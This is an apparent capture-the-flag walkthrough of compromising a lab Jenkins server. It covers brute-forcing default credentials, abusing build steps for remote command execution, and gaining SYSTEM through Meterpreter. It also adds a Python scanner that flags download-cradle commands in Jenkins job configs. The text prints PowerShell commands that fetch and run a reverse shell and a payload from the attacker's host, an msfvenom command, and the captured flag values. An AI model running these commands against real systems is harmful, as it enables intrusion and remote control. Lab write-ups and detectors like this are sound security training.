In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a Jenkins server running as a Windows service, find a way to carry out Remote Command Execution (RCE), use Metasploit to gain access to the box, and escalate my privileges to NT AUTHORITY\SYSTEM, which is the equivalent of root on a Windows machine.
⚔️ Challenge: I need to capture two “flags”, the user.txt flag and the root.txt flag. Let’s get started!
First, we’ll note down our IP addresses, export them as shell variables, and run our Nmap scan with the -Pn flag to skip host discovery (so the scan does not depend on the target answering ping).

IPs:
export myIP=10.6.2.23
export targetIP=10.10.99.176

┌──(tester㉿box)-[~/THM]
└─$ nmap 10.10.216.90 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 22:39 EST
Nmap scan report for 10.10.216.90
Host is up (0.083s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
We see that there are three open ports.
There is an HTTP service running on port 80. That is presumably a website that we will look at in a moment in our browser.
ms-wbt-server running on port 3389 looks interesting. A quick Google search reveals that it is Microsoft’s RDP (Remote Desktop Protocol) service.
http-proxy on 8080 looks intriguing.
On port 80 we find a picture of Batman in plainclothes. There’s not much to see here. A quick look at the HTML source doesn’t reveal anything else of interest.
HACKING JENKINS WITH BURPSUITE
On port 8080, we find a login page to Jenkins.
Let’s take a few guesses with some of the standard factory-set (default) passwords:
Using Burp Suite’s Proxy intercept and sending the login request to Intruder, we can set up a list of usernames and passwords to try as a sniper-style attack.
Based on the different lengths of the responses, we can see that admin:admin may be our winning combination. We are in luck that this company has lazy administrators who don’t properly safeguard their business! The system lets us in as expected with
At TryHackMe’s suggestion, we’ll use Nishang for spawning a reverse shell from Windows. Inside the Jenkins admin dashboard, we can click on project 1 and then on Configure.
In the last text box (the command field of the build step), we can perform remote command execution.
USING REMOTE COMMAND EXECUTION TO SPAWN A REVSHELL PAYLOAD
First, let’s spawn a reverse shell using Invoke-PowerShellTcp.ps1 from Nishang’s GitHub repo. After downloading the file from the repo, we launch a Netcat listener with the command:
nc -lnvp 8888
Then we use the following command in the last text box of the Jenkins project 1 settings (the script is served from our own machine on port 8000):
powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1')
After clicking on “build” in the Jenkins dashboard, we catch the shell on our Netcat listener and discover the user.txt flag:
!!! user.txt: 79007a09481963edf2e1321abd9ae2a0 !!!
USING MSFVENOM TO CREATE A MALICIOUS PAYLOAD
We can create a custom malicious payload that connects back to a more capable reverse shell (Meterpreter) inside Metasploit, using the following command on our attack box:
sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=4444 -f exe -o shell.exe
Now we need to start up the Metasploit console:
Load the generic handler module, exploit/multi/handler, which will catch the Meterpreter connection:
Set up our payload:
set payload windows/meterpreter/reverse_tcp
And finally, type:
First, we’ll spin up a simple HTTP server to copy shell.exe to Windows with:
python -m http.server 8000
Then we can copy and run the file on the target machine by again using remote command execution via the Jenkins edit build function:
powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.6.2.23:8000/shell.exe','shell.exe')"
And Metasploit successfully launches a new Meterpreter session on the target box. If the shell.exe file is grabbed successfully from the HTTP server (the server logs a 200 response) but no Meterpreter shell is spawned, we can use one more Jenkins RCE to run the revshell:
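The two build-step commands above are exactly what a defender should be hunting for in Jenkins job configurations. The following Python script is an added example, not code from this walkthrough or from the Jenkins project: it parses a job’s config.xml, pulls the command text out of the core “Execute Windows batch command” and “Execute shell” build steps (which Jenkins stores as hudson.tasks.BatchFile and hudson.tasks.Shell elements, each with a command child), and flags the PowerShell fetch-and-run patterns used here (DownloadString fed to iex, DownloadFile to disk). It generalises slightly beyond the post by also matching the usual PowerShell variants of the same idea. The sample config.xml is constructed for the demo and embeds the two commands from this post; the function and indicator names are my own.

```python
"""Flag Jenkins build steps that fetch and run remote code.

Added example for this walkthrough (not the post's or the Jenkins project's
own code). Jenkins persists each job under $JENKINS_HOME/jobs/<name>/config.xml
and writes core build steps as <hudson.tasks.BatchFile> ("Execute Windows
batch command") or <hudson.tasks.Shell> ("Execute shell"), each holding a
<command> element. This scanner reads those commands and reports the
PowerShell download-cradle patterns seen in the post, plus common variants.
"""
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

BUILD_STEP_TAGS = ("hudson.tasks.BatchFile", "hudson.tasks.Shell")

# (pattern, label). The first two match the exact techniques used in the post;
# the rest generalise to the usual PowerShell ways of expressing the same thing.
INDICATORS = [
    (re.compile(r"DownloadString\s*\(", re.I), "downloads script text straight into memory"),
    (re.compile(r"DownloadFile\s*\(", re.I), "drops a file fetched from a remote host"),
    (re.compile(r"\b(iex|Invoke-Expression)\b", re.I), "evaluates a string as code"),
    (re.compile(r"\b(iwr|Invoke-WebRequest)\b", re.I), "fetches a remote resource"),
    (re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "base64-encoded command line"),
    (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I), "URL pointing at a bare IP address"),
]

# Constructed sample: "project 1" after its build steps were edited.
# The two suspicious commands are the ones issued through Jenkins in the post.
SAMPLE_CONFIG_XML = """<project>
  <description>project 1</description>
  <builders>
    <hudson.tasks.BatchFile>
      <command>echo building</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.BatchFile>
      <command>powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1')</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.BatchFile>
      <command>powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.6.2.23:8000/shell.exe','shell.exe')"</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>
"""


def find_suspicious_build_steps(config_xml: str) -> list[dict]:
    """Return one finding per build step whose command matches an indicator.

    Each finding carries the step's position in the job, its element name,
    the raw command and the list of indicator labels that fired.
    """
    root = ET.fromstring(config_xml)
    findings = []
    position = 0
    for element in root.iter():  # document order keeps step numbering stable
        if element.tag not in BUILD_STEP_TAGS:
            continue
        position += 1
        command_node = element.find("command")
        command = (command_node.text or "").strip() if command_node is not None else ""
        hits = [label for pattern, label in INDICATORS if pattern.search(command)]
        if hits:
            findings.append({"step": position, "type": element.tag,
                             "command": command, "indicators": hits})
    return findings


def scan_jenkins_home(jenkins_home: str) -> dict[str, list[dict]]:
    """Scan every job config under $JENKINS_HOME/jobs; returns {job name: findings}."""
    results = {}
    for config in sorted(Path(jenkins_home, "jobs").glob("*/config.xml")):
        findings = find_suspicious_build_steps(config.read_text(encoding="utf-8"))
        if findings:
            results[config.parent.name] = findings
    return results


if __name__ == "__main__":
    # With a path argument, scan a real JENKINS_HOME; otherwise run on the sample.
    if len(sys.argv) > 1:
        report = scan_jenkins_home(sys.argv[1])
    else:
        report = {"project 1": find_suspicious_build_steps(SAMPLE_CONFIG_XML)}
    for job, findings in report.items():
        for f in findings:
            print(f"[{job}] step {f['step']} ({f['type']}): {', '.join(f['indicators'])}")
            print(f"    {f['command']}")
```

Run it with no arguments to see the two constructed hits, or point it at a real JENKINS_HOME to walk every job. A hit means that someone holding Job/Configure rights (here, whoever can log in as admin:admin) has pointed a build step at an external host; the real fix on this box is the credential hygiene the post pokes fun at, together with limiting who can edit job configurations at all. The scanner only covers the two core build-step types, so steps added by plugins (Pipeline scripts, the PowerShell plugin) need their own handling.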
PRIVILEGE ESCALATION TO ROOT
First, we issue the following command in our Meterpreter session to automatically escalate to the highest privilege possible:
We now operate with NT AUTHORITY\SYSTEM privileges for most things, but not every single command. To fix this, we can migrate into another process on the target machine that already runs as SYSTEM.
Entering the command “ps” will give us a list of processes. We’ll use the process system.exe with the following command:
migrate <PID> (the process ID of the target process running as NT AUTHORITY\SYSTEM, in this case
Now our Meterpreter session is running in the memory of the system.exe process on the target machine. We have full NT AUTHORITY\SYSTEM privileges and can easily find root.txt with the following commands:
find -f root.txt
cat root.txt
dff0f748678f280250f25a45b8046b4a
Thanks for reading/watching my walkthrough. 🙏
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.